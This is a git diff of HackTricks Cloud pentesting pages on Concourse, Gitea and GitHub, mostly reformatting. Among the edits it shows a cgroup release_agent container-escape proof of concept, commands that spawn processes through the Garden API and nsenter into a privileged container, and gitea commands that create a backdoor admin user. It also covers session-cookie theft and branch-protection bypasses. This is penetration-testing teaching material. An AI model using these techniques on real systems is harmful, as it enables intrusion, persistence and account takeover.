@@ -227,7 +211,7 @@ fly -t tutorial execute --privileged --config task_config.yml In the previous sections we saw how to **execute a privileged task with concourse**. This won't give the container exactly the same access as the privileged flag in a docker container. For example, you won't see the node filesystem device in /dev, so the escape could be more "complex". -In the following PoC we are going to use the release\_agent to escape with some small modifications: +In the following PoC we are going to use the release_agent to escape with some small modifications: ```bash # Mounts the RDMA cgroup controller and create a child cgroup @@ -287,13 +271,12 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" cat /output ``` -{% hint style="warning" %} -As you might have noticed this is just a [**regular release\_agent escape**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/concourse-security/broken-reference/README.md) just modifying the path of the cmd in the node -{% endhint %} +> [!WARNING] +> As you might have noticed this is just a [**regular release_agent escape**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/concourse-security/broken-reference/README.md) just modifying the path of the cmd in the node #### Escaping to the node from a Worker container -A regular release\_agent escape with a minor modification is enough for this: +A regular release_agent escape with a minor modification is enough for this: ```bash mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x 
@@ -364,14 +347,13 @@ select * from users; #### Abusing Garden Service - Not a real Attack -{% hint style="warning" %} -This are just some interesting notes about the service, but because it's only listening on localhost, this notes won't present any impact we haven't already exploited before -{% endhint %} +> [!WARNING] +> This are just some interesting notes about the service, but because it's only listening on localhost, this notes won't present any impact we haven't already exploited before By default each concourse worker will be running a [**Garden**](https://github.com/cloudfoundry/garden) service in port 7777. This service is used by the Web master to indicate the worker **what he needs to execute** (download the image and run each task). This sound pretty good for an attacker, but there are some nice protections: -* It's just **exposed locally** (127..0.0.1) and I think when the worker authenticates agains the Web with the special SSH service, a tunnel is created so the web server can **talk to each Garden service** inside each worker. -* The web server is **monitoring the running containers every few seconds**, and **unexpected** containers are **deleted**. So if you want to **run a custom container** you need to **tamper** with the **communication** between the web server and the garden service. +- It's just **exposed locally** (127..0.0.1) and I think when the worker authenticates agains the Web with the special SSH service, a tunnel is created so the web server can **talk to each Garden service** inside each worker. +- The web server is **monitoring the running containers every few seconds**, and **unexpected** containers are **deleted**. So if you want to **run a custom container** you need to **tamper** with the **communication** between the web server and the garden service. Concourse workers run with high container privileges: 
@@ -386,11 +368,10 @@ Capabilities: Seccomp: disabled ``` -However, techniques like **mounting** the /dev device of the node or release\_agent **won't work** (as the real device with the filesystem of the node isn't accesible, only a virtual one). We cannot access processes of the node, so escaping from the node without kernel exploits get complicated. +However, techniques like **mounting** the /dev device of the node or release_agent **won't work** (as the real device with the filesystem of the node isn't accesible, only a virtual one). We cannot access processes of the node, so escaping from the node without kernel exploits get complicated. -{% hint style="info" %} -In the previous section we saw how to escape from a privileged container, so if we can **execute** commands in a **privileged container** created by the **current** **worker**, we could **escape to the node**. -{% endhint %} +> [!NOTE] +> In the previous section we saw how to escape from a privileged container, so if we can **execute** commands in a **privileged container** created by the **current** **worker**, we could **escape to the node**. Note that playing with concourse I noted that when a new container is spawned to run something, the container processes are accessible from the worker container, so it's like a container creating a new container inside of it. @@ -410,7 +391,7 @@ curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/properties wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \ --header='Content-Type:application/json' \ 'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes' - + # OR instead of doing all of that, you could just get into the ns of the process of the privileged container nsenter --target 76011 --mount --uts --ipc --net --pid -- sh ``` 
@@ -456,19 +437,6 @@ Accept-Encoding: gzip. ## References -* https://concourse-ci.org/vars.html +- https://concourse-ci.org/vars.html -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} diff --git a/pentesting-ci-cd/concourse-security/concourse-lab-creation.md b/src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md similarity index 53% rename from pentesting-ci-cd/concourse-security/concourse-lab-creation.md rename to src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md index 2e65c7407..14b3c7845 100644 --- a/pentesting-ci-cd/concourse-security/concourse-lab-creation.md +++ b/src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md @@ -1,19 +1,6 @@ # Concourse Lab Creation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} ## Testing Environment @@ -71,7 +58,7 @@ subjects: - kind: ServiceAccount name: concourse-release-web namespace: default - + --- apiVersion: v1 
@@ -94,15 +81,15 @@ A pipeline is made of a list of [Jobs](https://concourse-ci.org/jobs.html) which Several different type of steps can be used: -* **the** [**`task` step**](https://concourse-ci.org/task-step.html) **runs a** [**task**](https://concourse-ci.org/tasks.html) -* the [`get` step](https://concourse-ci.org/get-step.html) fetches a [resource](https://concourse-ci.org/resources.html) -* the [`put` step](https://concourse-ci.org/put-step.html) updates a [resource](https://concourse-ci.org/resources.html) -* the [`set_pipeline` step](https://concourse-ci.org/set-pipeline-step.html) configures a [pipeline](https://concourse-ci.org/pipelines.html) -* the [`load_var` step](https://concourse-ci.org/load-var-step.html) loads a value into a [local var](https://concourse-ci.org/vars.html#local-vars) -* the [`in_parallel` step](https://concourse-ci.org/in-parallel-step.html) runs steps in parallel -* the [`do` step](https://concourse-ci.org/do-step.html) runs steps in sequence -* the [`across` step modifier](https://concourse-ci.org/across-step.html#schema.across) runs a step multiple times; once for each combination of variable values -* the [`try` step](https://concourse-ci.org/try-step.html) attempts to run a step and succeeds even if the step fails +- **the** [**`task` step**](https://concourse-ci.org/task-step.html) **runs a** [**task**](https://concourse-ci.org/tasks.html) +- the [`get` step](https://concourse-ci.org/get-step.html) fetches a [resource](https://concourse-ci.org/resources.html) +- the [`put` step](https://concourse-ci.org/put-step.html) updates a [resource](https://concourse-ci.org/resources.html) +- the [`set_pipeline` step](https://concourse-ci.org/set-pipeline-step.html) configures a [pipeline](https://concourse-ci.org/pipelines.html) +- the [`load_var` step](https://concourse-ci.org/load-var-step.html) loads a value into a [local var](https://concourse-ci.org/vars.html#local-vars) +- the [`in_parallel` 
step](https://concourse-ci.org/in-parallel-step.html) runs steps in parallel +- the [`do` step](https://concourse-ci.org/do-step.html) runs steps in sequence +- the [`across` step modifier](https://concourse-ci.org/across-step.html#schema.across) runs a step multiple times; once for each combination of variable values +- the [`try` step](https://concourse-ci.org/try-step.html) attempts to run a step and succeeds even if the step fails Each [step](https://concourse-ci.org/steps.html) in a [job plan](https://concourse-ci.org/jobs.html#schema.job.plan) runs in its **own container**. You can run anything you want inside the container _(i.e. run my tests, run this bash script, build this image, etc.)_. So if you have a job with five steps Concourse will create five containers, one for each step. @@ -112,26 +99,26 @@ Therefore, it's possible to indicate the type of container each step needs to be ```yaml jobs: -- name: simple - plan: - - task: simple-task - privileged: true - config: - # Tells Concourse which type of worker this task should run on - platform: linux - image_resource: - type: registry-image - source: - repository: busybox # images are pulled from docker hub by default - run: - path: sh - args: - - -cx - - | - sleep 1000 - echo "$SUPER_SECRET" - params: - SUPER_SECRET: ((super.secret)) + - name: simple + plan: + - task: simple-task + privileged: true + config: + # Tells Concourse which type of worker this task should run on + platform: linux + image_resource: + type: registry-image + source: + repository: busybox # images are pulled from docker hub by default + run: + path: sh + args: + - -cx + - | + sleep 1000 + echo "$SUPER_SECRET" + params: + SUPER_SECRET: ((super.secret)) ``` ```bash 
@@ -154,24 +141,11 @@ It's possible to **save the results of one task in a file** and indicate that it You don't need to trigger the jobs manually every-time you need to run them, you can also program them to be run every-time: -* Some time passes: [Time resource](https://github.com/concourse/time-resource/) -* On new commits to the main branch: [Git resource](https://github.com/concourse/git-resource) -* New PR's: [Github-PR resource](https://github.com/telia-oss/github-pr-resource) -* Fetch or push the latest image of your app: [Registry-image resource](https://github.com/concourse/registry-image-resource/) +- Some time passes: [Time resource](https://github.com/concourse/time-resource/) +- On new commits to the main branch: [Git resource](https://github.com/concourse/git-resource) +- New PR's: [Github-PR resource](https://github.com/telia-oss/github-pr-resource) +- Fetch or push the latest image of your app: [Registry-image resource](https://github.com/concourse/registry-image-resource/) Check a YAML pipeline example that triggers on new commits to master in [https://concourse-ci.org/tutorial-resources.html](https://concourse-ci.org/tutorial-resources.html) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} diff --git a/pentesting-ci-cd/gitea-security/README.md b/src/pentesting-ci-cd/gitea-security/README.md similarity index 58% rename from pentesting-ci-cd/gitea-security/README.md rename to src/pentesting-ci-cd/gitea-security/README.md index 46eb21749..b1b1842fd 100644 --- a/pentesting-ci-cd/gitea-security/README.md +++ b/src/pentesting-ci-cd/gitea-security/README.md @@ -1,31 +1,18 @@ # Gitea Security -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} ## What is Gitea **Gitea** is a **self-hosted community managed lightweight code hosting** solution written in Go. -![](<../../.gitbook/assets/image (160).png>) +![](<../../images/image (160).png>) ### Basic Information -{% content-ref url="basic-gitea-information.md" %} -[basic-gitea-information.md](basic-gitea-information.md) -{% endcontent-ref %} +{{#ref}} +basic-gitea-information.md +{{#endref}} ## Lab @@ -46,9 +33,9 @@ helm install gitea gitea-charts/gitea ## Unauthenticated Enumeration -* Public repos: [http://localhost:3000/explore/repos](http://localhost:3000/explore/repos) -* Registered users: [http://localhost:3000/explore/users](http://localhost:3000/explore/users) -* Registered Organizations: [http://localhost:3000/explore/organizations](http://localhost:3000/explore/organizations) +- Public repos: [http://localhost:3000/explore/repos](http://localhost:3000/explore/repos) +- Registered users: [http://localhost:3000/explore/users](http://localhost:3000/explore/users) +- Registered Organizations: [http://localhost:3000/explore/organizations](http://localhost:3000/explore/organizations) Note that by **default Gitea allows new users to register**. This won't give specially interesting access to the new users over other organizations/users repos, but a **logged in user** might be able to **visualize more repos or organizations**. 
@@ -62,9 +49,8 @@ If you somehow already have credentials for a user inside an organization (or yo Note that **2FA may be used** so you will only be able to access this information if you can also **pass that check**. -{% hint style="info" %} -Note that if you **manage to steal the `i_like_gitea` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA. -{% endhint %} +> [!NOTE] +> Note that if you **manage to steal the `i_like_gitea` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA. ### With User SSH Key @@ -78,7 +64,7 @@ With this key you can perform **changes in repositories where the user has some git config --list ``` -If the user has configured its username as his gitea username you can access the **public keys he has set** in his account in _https://github.com/\.keys_, you could check this to confirm the private key you found can be used. +If the user has configured its username as his gitea username you can access the **public keys he has set** in his account in _https://github.com/\.keys_, you could check this to confirm the private key you found can be used. **SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related. 
@@ -110,12 +96,12 @@ As explained in the basic information, the application will have **full access o In Github we have **github actions** which by default get a **token with write access** over the repo that can be used to **bypass branch protections**. In this case that **doesn't exist**, so the bypasses are more limited. But lets take a look to what can be done: -* **Enable Push**: If anyone with write access can push to the branch, just push to it. -* **Whitelist Restricted Pus**h: The same way, if you are part of this list push to the branch. -* **Enable Merge Whitelist**: If there is a merge whitelist, you need to be inside of it -* **Require approvals is bigger than 0**: Then... you need to compromise another user -* **Restrict approvals to whitelisted**: If only whitelisted users can approve... you need to compromise another user that is inside that list -* **Dismiss stale approvals**: If approvals are not removed with new commits, you could hijack an already approved PR to inject your code and merge the PR. +- **Enable Push**: If anyone with write access can push to the branch, just push to it. +- **Whitelist Restricted Pus**h: The same way, if you are part of this list push to the branch. +- **Enable Merge Whitelist**: If there is a merge whitelist, you need to be inside of it +- **Require approvals is bigger than 0**: Then... you need to compromise another user +- **Restrict approvals to whitelisted**: If only whitelisted users can approve... you need to compromise another user that is inside that list +- **Dismiss stale approvals**: If approvals are not removed with new commits, you could hijack an already approved PR to inject your code and merge the PR. Note that **if you are an org/repo admin** you can bypass the protections. 
@@ -137,29 +123,16 @@ In this file you can find **keys** and **passwords**. In the gitea path (by default: /data/gitea) you can find also interesting information like: -* The **sqlite** DB: If gitea is not using an external db it will use a sqlite db -* The **sessions** inside the sessions folder: Running `cat sessions/*/*/*` you can see the usernames of the logged users (gitea could also save the sessions inside the DB). -* The **jwt private key** inside the jwt folder -* More **sensitive information** could be found in this folder +- The **sqlite** DB: If gitea is not using an external db it will use a sqlite db +- The **sessions** inside the sessions folder: Running `cat sessions/*/*/*` you can see the usernames of the logged users (gitea could also save the sessions inside the DB). +- The **jwt private key** inside the jwt folder +- More **sensitive information** could be found in this folder If you are inside the server you can also **use the `gitea` binary** to access/modify information: -* `gitea dump` will dump gitea and generate a .zip file -* `gitea generate secret INTERNAL_TOKEN/JWT_SECRET/SECRET_KEY/LFS_JWT_SECRET` will generate a token of the indicated type (persistence) -* `gitea admin user change-password --username admin --password newpassword` Change the password -* `gitea admin user create --username newuser --password superpassword --email user@user.user --admin --access-token` Create new admin user and get an access token +- `gitea dump` will dump gitea and generate a .zip file +- `gitea generate secret INTERNAL_TOKEN/JWT_SECRET/SECRET_KEY/LFS_JWT_SECRET` will generate a token of the indicated type (persistence) +- `gitea admin user change-password --username admin --password newpassword` Change the password +- `gitea admin user create --username newuser --password superpassword --email user@user.user --admin --access-token` Create new admin user and get an access token -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks 
Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md b/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md
new file mode 100644
index 000000000..0fcc1a3f8
--- /dev/null
+++ b/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md
@@ -0,0 +1,103 @@ +# Basic Gitea Information + +{{#include ../../banners/hacktricks-training.md}} + +## Basic Structure + +The basic Gitea environment structure is to group repos by **organization(s),** each of them may contain **several repositories** and **several teams.** However, note that just like in github users can have repos outside of the organization. + +Moreover, a **user** can be a **member** of **different organizations**. Within the organization the user may have **different permissions over each repository**. + +A user may also be **part of different teams** with different permissions over different repos. + +And finally **repositories may have special protection mechanisms**. + +## Permissions + +### Organizations + +When an **organization is created** a team called **Owners** is **created** and the user is put inside of it. This team will give **admin access** over the **organization**, those **permissions** and the **name** of the team **cannot be modified**. + +**Org admins** (owners) can select the **visibility** of the organization: + +- Public +- Limited (logged in users only) +- Private (members only) + +**Org admins** can also indicate if the **repo admins** can **add and or remove access** for teams. They can also indicate the max number of repos. + +When creating a new team, several important settings are selected: + +- It's indicated the **repos of the org the members of the team will be able to access**: specific repos (repos where the team is added) or all. +- It's also indicated **if members can create new repos** (creator will get admin access to it) +- The **permissions** the **members** of the repo will **have**: + - **Administrator** access + - **Specific** access: + +![](<../../images/image (118).png>) + +### Teams & Users + +In a repo, the **org admin** and the **repo admins** (if allowed by the org) can **manage the roles** given to collaborators (other users) and teams. 
There are **3** possible **roles**: + +- Administrator +- Write +- Read + +## Gitea Authentication + +### Web Access + +Using **username + password** and potentially (and recommended) a 2FA. + +### **SSH Keys** + +You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [http://localhost:3000/user/settings/keys](http://localhost:3000/user/settings/keys) + +#### **GPG Keys** + +You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**. + +### **Personal Access Tokens** + +You can generate personal access token to **give an application access to your account**. A personal access token gives full access over your account: [http://localhost:3000/user/settings/applications](http://localhost:3000/user/settings/applications) + +### Oauth Applications + +Just like personal access tokens **Oauth applications** will have **complete access** over your account and the places your account has access because, as indicated in the [docs](https://docs.gitea.io/en-us/oauth2-provider/#scopes), scopes aren't supported yet: + +![](<../../images/image (194).png>) + +### Deploy keys + +Deploy keys might have read-only or write access to the repo, so they might be interesting to compromise specific repos. + +## Branch Protections + +Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**. + +The **branch protections of a repository** can be found in _https://localhost:3000/\/\/settings/branches_ + +> [!NOTE] +> It's **not possible to set a branch protection at organization level**. So all of them must be declared on each repo. 
+ +Different protections can be applied to a branch (like to master): + +- **Disable Push**: No-one can push to this branch +- **Enable Push**: Anyone with access can push, but not force push. +- **Whitelist Restricted Push**: Only selected users/teams can push to this branch (but no force push) +- **Enable Merge Whitelist**: Only whitelisted users/teams can merge PRs. +- **Enable Status checks:** Require status checks to pass before merging. +- **Require approvals**: Indicate the number of approvals required before a PR can be merged. +- **Restrict approvals to whitelisted**: Indicate users/teams that can approve PRs. +- **Block merge on rejected reviews**: If changes are requested, it cannot be merged (even if the other checks pass) +- **Block merge on official review requests**: If there official review requests it cannot be merged +- **Dismiss stale approvals**: When new commits, old approvals will be dismissed. +- **Require Signed Commits**: Commits must be signed. +- **Block merge if pull request is outdated** +- **Protected/Unprotected file patterns**: Indicate patterns of files to protect/unprotect against changes + +> [!NOTE] +> As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline. + +{{#include ../../banners/hacktricks-training.md}} diff --git a/pentesting-ci-cd/github-security/README.md b/src/pentesting-ci-cd/github-security/README.md similarity index 62% rename from pentesting-ci-cd/github-security/README.md rename to src/pentesting-ci-cd/github-security/README.md index 63f6124cc..dc8fdc948 100644 --- a/pentesting-ci-cd/github-security/README.md +++ b/src/pentesting-ci-cd/github-security/README.md 
@@ -1,19 +1,6 @@ # Github Security -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} ## What is Github @@ -21,17 +8,17 @@ Learn & practice GCP Hacking: [!WARNING] +> When you look for leaks in a repo and run something like `git log -p` don't forget there might be **other branches with other commits** containing secrets! ### External Forks @@ -71,9 +57,9 @@ It's possible to **compromise repos abusing pull requests**. To know if a repo i Even if deleted or internal it might be possible to obtain sensitive data from forks of github repositories. Check it here: -{% content-ref url="accessible-deleted-data-in-github.md" %} -[accessible-deleted-data-in-github.md](accessible-deleted-data-in-github.md) -{% endcontent-ref %} +{{#ref}} +accessible-deleted-data-in-github.md +{{#endref}} ## Organization Hardening 
@@ -81,42 +67,41 @@ Even if deleted or internal it might be possible to obtain sensitive data from f There are some **default privileges** that can be assigned to **members** of the organization. These can be controlled from the page `https://github.com/organizations//settings/member_privileges` or from the [**Organizations API**](https://docs.github.com/en/rest/orgs/orgs). -* **Base permissions**: Members will have the permission None/Read/write/Admin over the org repositories. Recommended is **None** or **Read**. -* **Repository forking**: If not necessary, it's better to **not allow** members to fork organization repositories. -* **Pages creation**: If not necessary, it's better to **not allow** members to publish pages from the org repos. If necessary you can allow to create public or private pages. -* **Integration access requests**: With this enabled outside collaborators will be able to request access for GitHub or OAuth apps to access this organization and its resources. It's usually needed, but if not, it's better to disable it. - * _I couldn't find this info in the APIs response, share if you do_ -* **Repository visibility change**: If enabled, **members** with **admin** permissions for the **repository** will be able to **change its visibility**. If disabled, only organization owners can change repository visibilities. If you **don't** want people to make things **public**, make sure this is **disabled**. - * _I couldn't find this info in the APIs response, share if you do_ -* **Repository deletion and transfer**: If enabled, members with **admin** permissions for the repository will be able to **delete** or **transfer** public and private **repositories.** - * _I couldn't find this info in the APIs response, share if you do_ -* **Allow members to create teams**: If enabled, any **member** of the organization will be able to **create** new **teams**. If disabled, only organization owners can create new teams. It's better to have this disabled. 
- * _I couldn't find this info in the APIs response, share if you do_ -* **More things can be configured** in this page but the previous are the ones more security related. +- **Base permissions**: Members will have the permission None/Read/write/Admin over the org repositories. Recommended is **None** or **Read**. +- **Repository forking**: If not necessary, it's better to **not allow** members to fork organization repositories. +- **Pages creation**: If not necessary, it's better to **not allow** members to publish pages from the org repos. If necessary you can allow to create public or private pages. +- **Integration access requests**: With this enabled outside collaborators will be able to request access for GitHub or OAuth apps to access this organization and its resources. It's usually needed, but if not, it's better to disable it. + - _I couldn't find this info in the APIs response, share if you do_ +- **Repository visibility change**: If enabled, **members** with **admin** permissions for the **repository** will be able to **change its visibility**. If disabled, only organization owners can change repository visibilities. If you **don't** want people to make things **public**, make sure this is **disabled**. + - _I couldn't find this info in the APIs response, share if you do_ +- **Repository deletion and transfer**: If enabled, members with **admin** permissions for the repository will be able to **delete** or **transfer** public and private **repositories.** + - _I couldn't find this info in the APIs response, share if you do_ +- **Allow members to create teams**: If enabled, any **member** of the organization will be able to **create** new **teams**. If disabled, only organization owners can create new teams. It's better to have this disabled. + - _I couldn't find this info in the APIs response, share if you do_ +- **More things can be configured** in this page but the previous are the ones more security related. 
### Actions Settings Several security related settings can be configured for actions from the page `https://github.com/organizations//settings/actions`. -{% hint style="info" %} -Note that all this configurations can also be set on each repository independently -{% endhint %} +> [!NOTE] +> Note that all this configurations can also be set on each repository independently -* **Github actions policies**: It allows you to indicate which repositories can tun workflows and which workflows should be allowed. It's recommended to **specify which repositories** should be allowed and not allow all actions to run. - * [**API-1**](https://docs.github.com/en/rest/actions/permissions#get-allowed-actions-and-reusable-workflows-for-an-organization)**,** [**API-2**](https://docs.github.com/en/rest/actions/permissions#list-selected-repositories-enabled-for-github-actions-in-an-organization) -* **Fork pull request workflows from outside collaborators**: It's recommended to **require approval for all** outside collaborators. - * _I couldn't find an API with this info, share if you do_ -* **Run workflows from fork pull requests**: It's highly **discouraged to run workflows from pull requests** as maintainers of the fork origin will be given the ability to use tokens with read permissions on the source repository. - * _I couldn't find an API with this info, share if you do_ -* **Workflow permissions**: It's highly recommended to **only give read repository permissions**. It's discouraged to give write and create/approve pull requests permissions to avoid the abuse of the GITHUB\_TOKEN given to running workflows. - * [**API**](https://docs.github.com/en/rest/actions/permissions#get-default-workflow-permissions-for-an-organization) +- **Github actions policies**: It allows you to indicate which repositories can tun workflows and which workflows should be allowed. It's recommended to **specify which repositories** should be allowed and not allow all actions to run. 
+ - [**API-1**](https://docs.github.com/en/rest/actions/permissions#get-allowed-actions-and-reusable-workflows-for-an-organization)**,** [**API-2**](https://docs.github.com/en/rest/actions/permissions#list-selected-repositories-enabled-for-github-actions-in-an-organization) +- **Fork pull request workflows from outside collaborators**: It's recommended to **require approval for all** outside collaborators. + - _I couldn't find an API with this info, share if you do_ +- **Run workflows from fork pull requests**: It's highly **discouraged to run workflows from pull requests** as maintainers of the fork origin will be given the ability to use tokens with read permissions on the source repository. + - _I couldn't find an API with this info, share if you do_ +- **Workflow permissions**: It's highly recommended to **only give read repository permissions**. It's discouraged to give write and create/approve pull requests permissions to avoid the abuse of the GITHUB_TOKEN given to running workflows. + - [**API**](https://docs.github.com/en/rest/actions/permissions#get-default-workflow-permissions-for-an-organization) ### Integrations _Let me know if you know the API endpoint to access this info!_ -* **Third-party application access policy**: It's recommended to restrict the access to every application and allow only the needed ones (after reviewing them). -* **Installed GitHub Apps**: It's recommended to only allow the needed ones (after reviewing them). +- **Third-party application access policy**: It's recommended to restrict the access to every application and allow only the needed ones (after reviewing them). +- **Installed GitHub Apps**: It's recommended to only allow the needed ones (after reviewing them). ## Recon & Attacks abusing credentials 
@@ -128,9 +113,8 @@ If you somehow already have credentials for a user inside an organization you ca Note that **2FA may be used** so you will only be able to access this information if you can also **pass that check**. -{% hint style="info" %} -Note that if you **manage to steal the `user_session` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA. -{% endhint %} +> [!NOTE] +> Note that if you **manage to steal the `user_session` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA. Check the section below about [**branch protections bypasses**](./#branch-protection-bypass) in case it's useful. @@ -146,7 +130,7 @@ With this key you can perform **changes in repositories where the user has some git config --list ``` -If the user has configured its username as his github username you can access the **public keys he has set** in his account in _https://github.com/\.keys_, you could check this to confirm the private key you found can be used. +If the user has configured its username as his github username you can access the **public keys he has set** in his account in _https://github.com/\.keys_, you could check this to confirm the private key you found can be used. **SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related. 
@@ -190,23 +174,23 @@ Moreover, as explained in the basic information, **organizations can give/deny a There are several techniques to compromise and abuse a Github Action, check them here: -{% content-ref url="abusing-github-actions/" %} -[abusing-github-actions](abusing-github-actions/) -{% endcontent-ref %} +{{#ref}} +abusing-github-actions/ +{{#endref}} ## Branch Protection Bypass -* **Require a number of approvals**: If you compromised several accounts you might just accept your PRs from other accounts. If you just have the account from where you created the PR you cannot accept your own PR. However, if you have access to a **Github Action** environment inside the repo, using the **GITHUB\_TOKEN** you might be able to **approve your PR** and get 1 approval this way. - * _Note for this and for the Code Owners restriction that usually a user won't be able to approve his own PRs, but if you are, you can abuse it to accept your PRs._ -* **Dismiss approvals when new commits are pushed**: If this isn’t set, you can submit legit code, wait till someone approves it, and put malicious code and merge it into the protected branch. -* **Require reviews from Code Owners**: If this is activated and you are a Code Owner, you could make a **Github Action create your PR and then approve it yourself**. - * When a **CODEOWNER file is missconfigured** Github doesn't complain but it does't use it. Therefore, if it's missconfigured it's **Code Owners protection isn't applied.** -* **Allow specified actors to bypass pull request requirements**: If you are one of these actors you can bypass pull request protections. -* **Include administrators**: If this isn’t set and you are admin of the repo, you can bypass this branch protections. -* **PR Hijacking**: You could be able to **modify the PR of someone else** adding malicious code, approving the resulting PR yourself and merging everything. 
